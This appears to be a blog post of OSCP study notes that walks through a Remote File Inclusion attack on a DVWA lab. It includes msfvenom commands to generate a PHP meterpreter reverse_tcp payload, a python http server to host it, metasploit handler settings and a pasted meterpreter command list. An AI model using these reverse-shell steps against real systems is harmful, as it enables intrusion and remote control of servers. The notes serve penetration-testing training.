• OSCP Learning Notes

    Remote File Inclusion[RFI]


    Download the DVWA from the following website and deploy it on your server.


    Install XAMPP and DVWA:

    1. Install XAMPP on Windows server. And change the Apache http port to 82 and ssl port to 4433.

    2.Unzip the DVWA files to C:xampphtdocs.

    3. Modify some configurations and browse the the DVWA website. The click the "Create/Reset Database" buttion.

    4. Login the DVWA using admin/passsord.

    5.Set the DVWA Security to Low and submit.

    6. Go the File Inclusion page.

     7. On Kali Linux, down load the file php-reverse-shell.php from the following website. And copy the file to /var/www/html.


    8.Change the ip and port and save it.

    9.On the folder /var/www/html, create the exploit.php using the following commands.

    msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 >> expoit.php

    10. Start the http server in the folder /var/www/html on Kali Linux.

    python3 -m http.server 80

    11. Start the metasploit tool , then set the LHOST, LPORT and payload moudle. Expolit  finanlly.

    set LHOST
    set LPORT 4444
    set payload php/meterpreter/reverse_tcp


    12.Browse the following url throuth Firefox.

     Exploit the target server sucessfully.

    13. Perform shell command to find usefull information.

    Core Commands
        Command                   Description
        -------                   -----------
        ?                         Help menu
        background                Backgrounds the current session
        bg                        Alias for background
        bgkill                    Kills a background meterpreter script
        bglist                    Lists running background scripts
        bgrun                     Executes a meterpreter script as a background thread
        channel                   Displays information or control active channels
        close                     Closes a channel
        disable_unicode_encoding  Disables encoding of unicode strings
        enable_unicode_encoding   Enables encoding of unicode strings
        exit                      Terminate the meterpreter session
        get_timeouts              Get the current session timeout values
        guid                      Get the session GUID
        help                      Help menu
        info                      Displays information about a Post module
        irb                       Open an interactive Ruby shell on the current session
        load                      Load one or more meterpreter extensions
        machine_id                Get the MSF ID of the machine attached to the session
        migrate                   Migrate the server to another process
        pivot                     Manage pivot listeners
        pry                       Open the Pry debugger on the current session
        quit                      Terminate the meterpreter session
        read                      Reads data from a channel
        resource                  Run the commands stored in a file
        run                       Executes a meterpreter script or Post module
        secure                    (Re)Negotiate TLV packet encryption on the session
        sessions                  Quickly switch to another session
        set_timeouts              Set the current session timeout values
        sleep                     Force Meterpreter to go quiet, then re-establish session.
        transport                 Change the current transport mechanism
        use                       Deprecated alias for "load"
        uuid                      Get the UUID for the current session
        write                     Writes data to a channel
    Stdapi: File system Commands
        Command       Description
        -------       -----------
        cat           Read the contents of a file to the screen
        cd            Change directory
        checksum      Retrieve the checksum of a file
        cp            Copy source to destination
        dir           List files (alias for ls)
        download      Download a file or directory
        edit          Edit a file
        getlwd        Print local working directory
        getwd         Print working directory
        lcd           Change local working directory
        lls           List local files
        lpwd          Print local working directory
        ls            List files
        mkdir         Make directory
        mv            Move source to destination
        pwd           Print working directory
        rm            Delete the specified file
        rmdir         Remove directory
        search        Search for files
        upload        Upload a file or directory
    Stdapi: Networking Commands
        Command       Description
        -------       -----------
        portfwd       Forward a local port to a remote service
    Stdapi: System Commands
        Command       Description
        -------       -----------
        execute       Execute a command
        getenv        Get one or more environment variable values
        getpid        Get the current process identifier
        getuid        Get the user that the server is running as
        kill          Terminate a process
        localtime     Displays the target system's local date and time
        pgrep         Filter processes by name
        pkill         Terminate processes by name
        ps            List running processes
        shell         Drop into a system command shell
        sysinfo       Gets information about the remote system, such as OS
    Stdapi: Audio Output Commands
        Command       Description
        -------       -----------
        play          play an audio file on target system, nothing written on disk
    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
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  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11222194.html
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